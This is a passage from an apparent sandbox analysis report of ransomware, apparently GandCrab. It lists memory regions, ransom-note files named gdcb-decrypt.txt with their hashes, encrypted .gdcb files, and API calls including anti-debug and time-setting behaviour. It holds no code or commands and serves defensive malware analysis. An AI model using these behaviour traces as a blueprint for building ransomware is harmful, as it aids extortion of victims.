- |
| crypt32.dll | 0x77040000 | 0x771befff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x77220000 | 0x7722dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x772c0000 | 0x77337fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x77340000 | 0x77388fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x77390000 | 0x77398fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x773a0000 | 0x77407fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77410000 | 0x77577fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007fead000 | 0x7fead000 | 0x7feaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc731fffff | Private Memory | Readable |
|
|
|
- |
| ntdll.dll | 0x7ffc73200000 | 0x7ffc733a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ffc733aa000 | 0x7ffc733aa000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
|
For performance reasons, the remaining 17 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\5jghkoaofdp\appdata\local\microsoft\windows\inetcache\ie\vzk262qe\nval3l9q.htm | 0.01 KB |
MD5:
57e8c72cebb02d041da05bced1877d88
SHA1: ded81e42a51de6b79790ef50bba691906c46fc29 SHA256: 479ba34e45c56d3850a558ec467b3bfb6ba8e5a28e16a1095763d1f9ceae21d2 |
|
|
| c:\users\5jghkoaofdp\appdata\local\microsoft\windows\inetcache\ie\vzk262qe\curl[1].htm | 5.57 KB |
MD5:
81b3cce7d4e7796889feab729213f603
SHA1: 68f945d6f0690ea07db365a170307d6ec1fd626a SHA256: 196f7923b3403b6bec0e478dffda9d0139aa30b806e4fb89b73876a9c2a503c9 |
|
|
| c:\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\$recycle.bin\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\$recycle.bin\s-1-5-19\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\$recycle.bin\s-1-5-21-3643094112-4209292109-138530109-1001\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\bg-bg\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\cs-cz\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\da-dk\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\de-de\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\el-gr\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\en-gb\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\en-us\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\es-es\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\et-ee\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\fi-fi\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\fonts\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\fr-fr\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\hr-hr\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\hu-hu\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\it-it\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\ja-jp\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\ko-kr\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\lt-lt\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\lv-lv\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\nb-no\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\nl-nl\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\pl-pl\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\pt-br\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\pt-pt\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\qps-ploc\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\resources\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\resources\en-us\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\ro-ro\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\ru-ru\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\sk-sk\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\sl-si\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\sr-latn-cs\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\sr-latn-rs\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\sv-se\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\tr-tr\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\uk-ua\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\zh-cn\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\zh-hk\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\zh-tw\gdcb-decrypt.txt | 2.55 KB |
MD5:
e6cf22b643516b1cbc1454324c2aa5cb
SHA1: 22726d8300f1511353749f6fb1ac1daa05a3c915 SHA256: a4382db195164b328ba5d86c2fec6e5505cc7e769a564a466193382813c85f12 |
|
|
| c:\boot\bootstat.dat.gdcb | 64.52 KB |
MD5:
61837361532f862e30ffee38c44eda46
SHA1: c0092de53a8bed8dc8ee0cfaea61b1b6f3f2124a SHA256: eadfa2893129bb8a4142c54e6c5be229fa24e7f4cb6e3396a368f420cc98630f |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\5jghkoaofdp\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3643094112-4209292109-138530109-1001\f38507b2d5f90131ac97816a970da7f0_d4f05a1a-9632-4b29-acc8-98bb6de773ed | 0.05 KB |
MD5:
469aa816010c9c8639a9176f625189af
SHA1: 2f1050adf64f33298ff0ce423eb86d4728441b21 SHA256: 7955cb2de90dd9efc6df9fdbf5f5d10c114f4135a9a6b52db1003be749e32f7a |
|
|
| c:\boot\bootstat.dat | 64.52 KB |
MD5:
61837361532f862e30ffee38c44eda46
SHA1: c0092de53a8bed8dc8ee0cfaea61b1b6f3f2124a SHA256: eadfa2893129bb8a4142c54e6c5be229fa24e7f4cb6e3396a368f420cc98630f |
|
|
| c:\users\5jghkoaofdp\appdata\local\microsoft\windows\inetcache\counters.dat | 0.12 KB |
MD5:
249407e9ef04738cf8e05e1ff9bc43c8
SHA1: da14d34b9904e36924c14b8ee91b019a29dc7b6f SHA256: 439beb7c177c913cb30d10b2e93bd4eddca2e62754277ba0fff2784058813aac |
|
|
Threads
Thread 0x38
410
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x766f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = InitializeCriticalSectionEx, address_out = 0x766fe84f |
|
1 | |
| Module | Load | module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x766f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsAlloc, address_out = 0x766ff92a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsSetValue, address_out = 0x766fd65c |
|
1 | |
| Module | Load | module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x766f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = InitializeCriticalSectionEx, address_out = 0x766fe84f |
|
1 | |
| Module | Load | module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x766f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsAlloc, address_out = 0x766ff92a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsGetValue, address_out = 0x766fd1e5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsSetValue, address_out = 0x766fd65c |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Module | Load | module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x766f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = LCMapStringEx, address_out = 0x766fed47 |
|
1 | |
| Module | Get Filename | process_name = c:\users\5jghkoaofdp\appdata\roamingeox20.exe, file_name_orig = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe, size = 260 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| System | Set Time | type = System Time, new_time = 4000-00-64 00:00:65316 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76520000 |
|
1 | |
| System | Set Time | type = System Time, new_time = 4000-00-64 00:00:65316 (UTC) |
|
248 | |
| System | Get Info | type = Hardware Information |
|
249 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7653971f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x7653a669 |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x76520000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x765337c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7653971f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x765337a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76539a5d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7653d17a |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76520000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7653971f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76547f64 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7654607c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x765337a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76539a7f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x765398c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x774347f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x765336c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x765337c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x76545da4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x7654750c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x7654717c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x7654780c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x765475c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76563d38 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x7653ce24 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76533360 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76531960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x774583cd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77458444 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x7653c318 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x7653980c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76534eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76537cf2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76534ee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x7653c433 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x765474a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77472974 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x7653c460 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x7653c329 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x765475fc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x7653ad26 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76533760 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76533580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76534cf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x7653cda2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x7653ca7d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7653d16f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x7653bc04 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76563e7f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x7653cf38 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76547230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76534ed0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7653d17a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x7653be7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76531940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76533560 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x7653bdf2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x7653a7c6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x7744fd00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x7744fd40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76531990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x7653bc6d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76539864 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76544c37 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x7653be5c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x7653bde1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7653c83c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x76545a0d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77450821 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77438d38 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x7653c2f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x7745afa9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x7653986f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x765473ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x7654777c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76547788 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x7654732c |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75180000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x751f4c49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x7518b722 |
|
1 | |
